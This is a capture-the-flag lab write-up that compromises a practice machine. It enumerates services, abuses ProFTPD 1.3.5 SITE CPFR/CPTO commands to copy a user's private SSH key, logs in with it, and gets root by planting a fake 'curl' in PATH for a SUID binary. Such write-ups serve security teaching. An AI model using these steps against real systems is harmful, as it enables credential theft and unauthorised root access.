Upon starting the machine, I was presented with the following IP address:
First step was to start enumerating the machine via portscan
sudo nmap -sT -sU -sV -Pn
Once complete, we see the following results
From this scan, we can discern the following:
1. Server is running ProFTPD 1.3.5. Further investigation shows this has multiple vulnerabilities
2. Server is running a webserver
3. Server has SSH and SMB open
Saving the vulnerable FTP service for later, we will first enumerate the endpoints SMB service
nmap -p445 –script smb-enum-shares,smb-enum-users
The resulting scan shows us that not only do we have anonymous login, but we also have READ/WRITE
Now that we know anonymous login is enabled, lets connect to it and see what’s inside
smbclient //
Looks like an interesting file, log.txt is inside. Let’s download the file and take a look at it
smbget -R smb://
cat log.txt
While viewing the file, you’ll notice that an ssh key pair was generated for Kenobi. This may be useful later. Let’s take note of that
Earlier, we noted a few open ports. Port 111 being one of them. A quick Google search says that this is possibly an nfs port.
Having that small tidbit of info, lets enumerate it. First, lets check for some associated nmap scripts
cat /usr/share/nmap/scripts/script.db | grep nfs
Lets go ahead and run these scripts
nmap -p111 — script nfs-ls,nfs-showmount,nfs-statfs
Looks like we found ourselves a mount
Remember that RSA key we found earlier? We need to find a way to get that key so that we can ssh into the box. Luckily, we have READ/WRITE access to the /var mount. So why not just copy it there? But how will we do that? Well from earlier we noted that ProFTPD 1.3.5 service that is running on the machine. Is there something we can do with that? Well, let’s check Metasploit
search proftpd
Looks like we have a matching exploit
Let’s get more info on the one that matches our version number
info exploit/unix/ftp/proftpd_modcopy_exec
Interesting. Apparently, we can copy any file on the system with the SITE CPTO and CPFR commands with this ProFTPD version. Let’s connect to it with netcat, and use the indicated commands to copy the ssh key into the mount
nc 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa
Looks like it worked.
Now we just need to mount the folder, copy the file locally, then go ahead and ssh into it
mkdir /mnt/Kenobi
mount /mnt/kenobi
ls -la /mnt/Kenobi/tmp
Looks like a success. Now let’s copy the key locally and give it proper permissions. Once complete, lets use that key to ssh into the box
cp /mnt/Kenobi/tmp/id_rsa .
chmod 600 id_rsa
ssh -i id_rsa kenobi@
Success! We’re in! But, we really, really, REALLY want root… so lets check and see if there’s anything we can leverage
find / -perm -u=s -type f 2>/dev/null
Most of this stuff is pretty standard. Except one… /usr/bin/menu? Whats that?
Looks like its used to check the status of the server. But how? Let’s try something….
strings /usr/bin/menu
Looks like it calls curl to check it. But its not using an exact path (i.e. /usr/bin/curl). So let’s do the math. /usr/bin/menu runs with root privs and doesn’t use absolute paths to call other functionality. So what if we copied bash into curl and exported it to PATH, then allowed the menu app to call it? I mean, the application isn’t looking for /usr/bin/curl…. Just curl. It doesn’t care where curls at…..
echo /bin/sh > curl
chmod 777 curl
export PATH=/home/kenobi:$PATH
So now what?
Holy cow, it worked! We have r00t! Now we can read the flag